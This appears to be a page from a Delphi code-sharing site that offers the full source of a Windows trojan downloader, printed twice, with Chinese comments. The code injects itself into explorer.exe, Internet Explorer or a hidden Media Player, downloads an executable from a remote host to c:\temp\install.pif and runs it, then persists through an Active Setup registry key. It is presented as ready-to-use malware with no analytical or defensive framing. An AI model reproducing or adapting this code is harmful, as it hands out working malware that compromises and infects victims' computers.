delphi注入下载者源代码
program InjectTheSelf;
{$IMAGEBASE $13140000}
uses Windows;
var
//动态加载shell32.dll中的ShellExecuteA函数
ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;
//动态加载Urlmon.dll中的UrlDownloadToFileA函数
Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;
hShell,hUrlmon: THandle;
//插入IE需要用到的函数
function GetIEAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := '%programfiles%\Internet Explorer\IEXPLORE.EXE';
RegCloseKey(iekey);
end;
//写注册表 用到的函数 为activeX启动准备
function Skrivreg(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
result := false;
RegCreateKey(key,PChar(subkey),regkey);
if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
result := true;
RegCloseKey(regkey);
end;
//插入media player用到的函数
function GetwmAppPath:string;
var
wmkey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\wmplayer.EXE',0,KEY_ALL_ACCESS,wmkey);
dLength := SizeOf(iename);
if RegQueryValueEx(wmkey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := '%programfiles%\Windows Media Player\wmplayer.EXE';
RegCloseKey(wmkey);
end;
procedure Download; //下载过程
begin
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell:=LoadLibrary('Shell32.dll');
hUrlmon:=LoadLibrary('urlmon.dll');
@ShellRun:= GetProcAddress(hShell,'ShellExecuteA');
@Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');
Downfile(nil,'http://remoteip.3322.org/c2c.exe','c:\temp\install.pif', 0, nil);
ShellRun(0,'open','c:\temp\install.pif',nil,nil,5);
ExitProcess(0);
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
Module := Pointer(GetModuleHandle(nil));
//得到内存映像的长度
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//在Exp进程的内存范围内分配一个足够长度的内存
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
//确定起始基址和内存映像基址的位置
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定上面各项数据后,这里开始进行操作
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
//建立远程线程,至此注入过程完成
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
procedure RunInject(InjType:integer);
var
ProcessHandle, PID: longword;
begin
if InjType=0 then //注入explorer.exe
begin
//获取Exp进程的PID码
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
end
else
if InjType=3 then //注入 media player
begin
winexec(PChar(GetwmAppPath),sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('WMPlayerApp', nil), @Pid);
end
else //注入iexplore.exe
begin
//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
winexec(PChar(GetIEAppPath),sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
end;
//打开进程
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
//关闭对像
CloseHandle(ProcessHandle);
end;
BEGIN
//activex自启动
skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515}','StubPath','c:\temp\install.pif');
RegDeleteKey(HKEY_current_user,'SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515}');
RunInject(3); //这里改为 :1 注入iexplore.exe 0 注入explorer.exe 3注人media player
end.
{$IMAGEBASE $13140000}
uses Windows;
var
//动态加载shell32.dll中的ShellExecuteA函数
ShellRun:function (hWnd: HWND; Operation, FileName, Parameters,Directory: PChar; ShowCmd: Integer):Cardinal; stdcall;
//动态加载Urlmon.dll中的UrlDownloadToFileA函数
Downfile:function (Caller: pointer; URL: PChar; FileName: PChar; Reserved:LongWord; StatusCB: pointer): Longint; stdcall;
hShell,hUrlmon: THandle;
//插入IE需要用到的函数
function GetIEAppPath:string;
var
iekey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE',0,KEY_ALL_ACCESS,iekey);
dLength := SizeOf(iename);
if RegQueryValueEx(iekey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := '%programfiles%\Internet Explorer\IEXPLORE.EXE';
RegCloseKey(iekey);
end;
//写注册表 用到的函数 为activeX启动准备
function Skrivreg(key:Hkey; subkey,name,value:string):boolean;
var
regkey:hkey;
begin
result := false;
RegCreateKey(key,PChar(subkey),regkey);
if RegSetValueEx(regkey,Pchar(name),0,REG_EXPAND_SZ,pchar(value),length(value)) = 0 then
result := true;
RegCloseKey(regkey);
end;
//插入media player用到的函数
function GetwmAppPath:string;
var
wmkey: Hkey;
iename: array [0..255] of char;
vType,dLength :DWORD;
begin
vType := REG_SZ;
RegOpenKeyEx(HKEY_LOCAL_MACHINE,'Software\Microsoft\Windows\CurrentVersion\App Paths\wmplayer.EXE',0,KEY_ALL_ACCESS,wmkey);
dLength := SizeOf(iename);
if RegQueryValueEx(wmkey, '' , nil, @vType, @iename[0], @dLength) = 0 then
Result := iename
else
Result := '%programfiles%\Windows Media Player\wmplayer.EXE';
RegCloseKey(wmkey);
end;
procedure Download; //下载过程
begin
LoadLibrary('kernel32.dll');
LoadLibrary('user32.dll');
hShell:=LoadLibrary('Shell32.dll');
hUrlmon:=LoadLibrary('urlmon.dll');
@ShellRun:= GetProcAddress(hShell,'ShellExecuteA');
@Downfile:= GetProcAddress(hUrlmon,'URLDownloadToFileA');
Downfile(nil,'http://remoteip.3322.org/c2c.exe','c:\temp\install.pif', 0, nil);
ShellRun(0,'open','c:\temp\install.pif',nil,nil,5);
ExitProcess(0);
end;
procedure Inject(ProcessHandle: longword; EntryPoint: pointer);
var
Module, NewModule: Pointer;
Size, BytesWritten, TID: longword;
begin
//这里得到的值为一个返回指针型变量,指向内容包括进程映像的基址
Module := Pointer(GetModuleHandle(nil));
//得到内存映像的长度
Size := PImageOptionalHeader(Pointer(integer(Module) + PImageDosHeader(Module)._lfanew +
SizeOf(dword) + SizeOf(TImageFileHeader))).SizeOfImage;
//在Exp进程的内存范围内分配一个足够长度的内存
VirtualFreeEx(ProcessHandle, Module, 0, MEM_RELEASE);
//确定起始基址和内存映像基址的位置
NewModule := VirtualAllocEx(ProcessHandle, Module, Size, MEM_COMMIT or MEM_RESERVE, PAGE_EXECUTE_READWRITE);
//确定上面各项数据后,这里开始进行操作
WriteProcessMemory(ProcessHandle, NewModule, Module, Size, BytesWritten);
//建立远程线程,至此注入过程完成
CreateRemoteThread(ProcessHandle, nil, 0, EntryPoint, Module, 0, TID);
end;
procedure RunInject(InjType:integer);
var
ProcessHandle, PID: longword;
begin
if InjType=0 then //注入explorer.exe
begin
//获取Exp进程的PID码
GetWindowThreadProcessId(FindWindow('Shell_TrayWnd', nil), @Pid);
end
else
if InjType=3 then //注入 media player
begin
winexec(PChar(GetwmAppPath),sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('WMPlayerApp', nil), @Pid);
end
else //注入iexplore.exe
begin
//CreateProcess(nil,PChar(GetIEAppPath), nil, nil, False, 0, nil, nil, StartupInfo, ProcessInfo);
winexec(PChar(GetIEAppPath),sw_hide);
sleep(500);
GetWindowThreadProcessId(FindWindow('IEFrame', nil), @Pid);
end;
//打开进程
ProcessHandle := OpenProcess(PROCESS_ALL_ACCESS, False, PID);
Inject(ProcessHandle, @Download);
//关闭对像
CloseHandle(ProcessHandle);
end;
BEGIN
//activex自启动
skrivreg(HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515}','StubPath','c:\temp\install.pif');
RegDeleteKey(HKEY_current_user,'SOFTWARE\Microsoft\Active Setup\Installed Components\{2bf41072-b2b1-21c1-b5c1-0305f4155515}');
RunInject(3); //这里改为 :1 注入iexplore.exe 0 注入explorer.exe 3注人media player
end.
推荐分享
图文皆来源于网络,内容仅做公益性分享,版权归原作者所有,如有侵权请告知删除!
Copyright © 2014 DelphiW.com 开发 源码 文档 技巧 All Rights Reserved
晋ICP备14006235号-8 晋公网安备 14108102000087号
执行时间: 0.034917116165161 seconds